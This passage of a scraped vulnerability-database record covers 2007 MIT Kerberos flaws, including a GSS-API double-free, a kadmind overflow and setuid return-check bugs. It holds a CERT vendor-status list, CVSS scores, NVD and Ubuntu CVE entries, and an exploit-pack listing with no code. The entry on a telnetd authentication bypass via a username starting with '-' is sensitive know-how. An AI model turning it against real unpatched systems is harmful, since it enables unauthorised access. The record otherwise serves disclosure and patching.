April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC, Inc. (formerly Data General Corporation) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ericsson Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fortinet, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Foundry Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Global Technology Associates Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hyperchip Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IP Filter Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Intel Corporation Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Internet Security Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### KTH Kerberos Team Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Linksys (A division of Cisco Systems) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Lucent Technologies Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Luminous Networks Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multinet (owned Process Software Corporation) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multitech, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Network Appliance, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NextHop Technologies, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nortel Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Redback Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Riverstone Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secure Computing Network Security Division Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secureworx, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Stonesoft Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### eSoft, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### netfilter Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 79 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- \nTemporal | 0 | E:ND/RL:ND/RC:ND \nEnvironmental | 0 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-003.txt>\n * <http://secunia.com/advisories/24757/>\n * <http://secunia.com/advisories/24735/>\n * <http://secunia.com/advisories/24750/>\n * <http://secunia.com/advisories/24740/>\n * <http://securitytracker.com/alerts/2007/Apr/1017852.html>\n * <http://docs.info.apple.com/article.html?artnum=305391>\n * <http://secunia.com/advisories/24966/>\n\n### Acknowledgements\n\nThis issue is addressed in MIT krb5 Security Advisory MITKRB5-SA-2007-003.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-1216](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-1216>) \n---|--- \n**Severity Metric:** | 17.85 \n**Date Public:** | 2007-04-03 \n**Date First Published:** | 2007-04-03 \n**Date Last Updated: ** | 2007-04-23 19:26 UTC \n**Document Revision: ** | 44 \n", "cvss3": {}, "published": "2007-04-03T00:00:00", "type": "cert", "title": "MIT Kerberos 5 GSS-API library double-free vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1216"], "modified": "2007-04-23T19:26:00", "id": "VU:419344", "href": "https://www.kb.cert.org/vuls/id/419344", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "d2": [{"lastseen": "2021-07-28T14:32:19", "description": "**Name**| d2sec_krb5_telnetd \n---|--- \n**CVE**| CVE-2007-0956 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| MIT Krb5 telnetd vulnerability \n**Notes**| \n", "cvss3": {}, "published": "2007-04-06T01:19:00", "type": "d2", "title": "DSquare Exploit Pack: D2SEC_KRB5_TELNETD", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956"], "modified": "2007-04-06T01:19:00", "id": "D2SEC_KRB5_TELNETD", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_krb5_telnetd", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-05-28T14:45:07", "description": "The (1) ftpd and (2) ksu programs in (a) MIT Kerberos 5 (krb5) up to 1.5,\nand 1.4.x before 1.4.4, and (b) Heimdal 0.7.2 and earlier, do not check\nreturn codes for setuid calls, which might allow local users to gain\nprivileges by causing setuid to fail to drop privileges. NOTE: as of\n20060808, it is not known whether an exploitable attack scenario exists for\nthese issues.", "cvss3": {}, "published": "2006-08-09T00:00:00", "type": "ubuntucve", "title": "CVE-2006-3084", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3084"], "modified": "2006-08-09T00:00:00", "id": "UB:CVE-2006-3084", "href": "https://ubuntu.com/security/CVE-2006-3084", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:45:07", "description": "The (1) krshd and (2) v4rcp applications in (a) MIT Kerberos 5 (krb5) up to\n1.5, and 1.4.x before 1.4.4, when running on Linux and AIX, and (b) Heimdal\n0.7.2 and earlier, do not check return codes for setuid calls, which allows\nlocal users to gain privileges by causing setuid to fail to drop privileges\nusing attacks such as resource exhaustion.", "cvss3": {}, "published": "2006-08-09T00:00:00", "type": "ubuntucve", "title": "CVE-2006-3083", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083"], "modified": "2006-08-09T00:00:00", "id": "UB:CVE-2006-3083", "href": "https://ubuntu.com/security/CVE-2006-3083", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:43:51", "description": "Stack-based buffer overflow in the krb5_klog_syslog function in the kadm5\nlibrary, as used by the Kerberos administration daemon (kadmind) and Key\nDistribution Center (KDC), in MIT krb5 before 1.6.1 allows remote\nauthenticated users to execute arbitrary code and modify the Kerberos key\ndatabase via crafted arguments, possibly involving certain format string\nspecifiers.", "cvss3": {}, "published": "2007-04-06T00:00:00", "type": "ubuntucve", "title": "CVE-2007-0957", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0957"], "modified": "2007-04-06T00:00:00", "id": "UB:CVE-2007-0957", "href": "https://ubuntu.com/security/CVE-2007-0957", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:43:51", "description": "Double free vulnerability in the GSS-API library\n(lib/gssapi/krb5/k5unseal.c), as used by the Kerberos administration daemon\n(kadmind) in MIT krb5 before 1.6.1, when used with the authentication\nmethod provided by the RPCSEC_GSS RPC library, allows remote authenticated\nusers to execute arbitrary code and modify the Kerberos key database via a\nmessage with an \"an invalid direction encoding\".", "cvss3": {}, "published": "2007-04-06T00:00:00", "type": "ubuntucve", "title": "CVE-2007-1216", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1216"], "modified": "2007-04-06T00:00:00", "id": "UB:CVE-2007-1216", "href": "https://ubuntu.com/security/CVE-2007-1216", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:43:51", "description": "The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote\nattackers to bypass authentication and gain system access via a username\nbeginning with a '-' character, a similar issue to CVE-2007-0882.", "cvss3": {}, "published": "2007-04-06T00:00:00", "type": "ubuntucve", "title": "CVE-2007-0956", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0882", "CVE-2007-0956"], "modified": "2007-04-06T00:00:00", "id": "UB:CVE-2007-0956", "href": "https://ubuntu.com/security/CVE-2007-0956", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-28T14:06:30", "description": "The (1) ftpd and (2) ksu programs in (a) MIT Kerberos 5 (krb5) up to 1.5, and 1.4.x before 1.4.4, and (b) Heimdal 0.7.2 and earlier, do not check return codes for setuid calls, which might allow local users to gain privileges by causing setuid to fail to drop privileges. NOTE: as of 20060808, it is not known whether an exploitable attack scenario exists for these issues.", "cvss3": {}, "published": "2006-08-09T10:04:00", "type": "cve", "title": "CVE-2006-3084", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3084"], "modified": "2020-01-21T15:45:00", "cpe": ["cpe:/a:heimdal:heimdal:0.7.2", "cpe:/a:mit:kerberos_5:1.4.2", "cpe:/a:mit:kerberos_5:1.4.3", "cpe:/a:mit:kerberos_5:1.5", "cpe:/a:mit:kerberos_5:1.4.1", "cpe:/a:mit:kerberos_5:1.4"], "id": "CVE-2006-3084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3084", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mit:kerberos_5:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:heimdal:heimdal:0.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.4.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T14:06:29", "description": "The (1) krshd and (2) v4rcp applications in (a) MIT Kerberos 5 (krb5) up to 1.5, and 1.4.x before 1.4.4, when running on Linux and AIX, and (b) Heimdal 0.7.2 and earlier, do not check return codes for setuid calls, which allows local users to gain privileges by causing setuid to fail to drop privileges using attacks such as resource exhaustion.", "cvss3": {}, "published": "2006-08-09T10:04:00", "type": "cve", "title": "CVE-2006-3083", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083"], "modified": "2020-01-21T15:45:00", "cpe": ["cpe:/a:heimdal:heimdal:0.7.2", "cpe:/a:mit:kerberos_5:1.4.2", "cpe:/a:mit:kerberos_5:1.4.3", "cpe:/a:mit:kerberos_5:1.5", "cpe:/a:mit:kerberos_5:1.4.1", "cpe:/a:mit:kerberos_5:1.4"], "id": "CVE-2006-3083", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3083", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mit:kerberos_5:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:heimdal:heimdal:0.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.4.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T14:00:58", "description": "Stack-based buffer overflow in the krb5_klog_syslog function in the kadm5 library, as used by the Kerberos administration daemon (kadmind) and Key Distribution Center (KDC), in MIT krb5 before 1.6.1 allows remote authenticated users to execute arbitrary code and modify the Kerberos key database via crafted arguments, possibly involving certain format string specifiers.", "cvss3": {}, "published": "2007-04-06T01:19:00", "type": "cve", "title": "CVE-2007-0957", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0957"], "modified": "2021-02-02T18:24:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:6.10", "cpe:/o:debian:debian_linux:4.0", "cpe:/o:canonical:ubuntu_linux:5.10", "cpe:/o:canonical:ubuntu_linux:6.06", "cpe:/o:debian:debian_linux:3.1"], "id": "CVE-2007-0957", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0957", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:6.06:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:6.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:5.10:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T14:01:44", "description": "Double free vulnerability in the GSS-API library 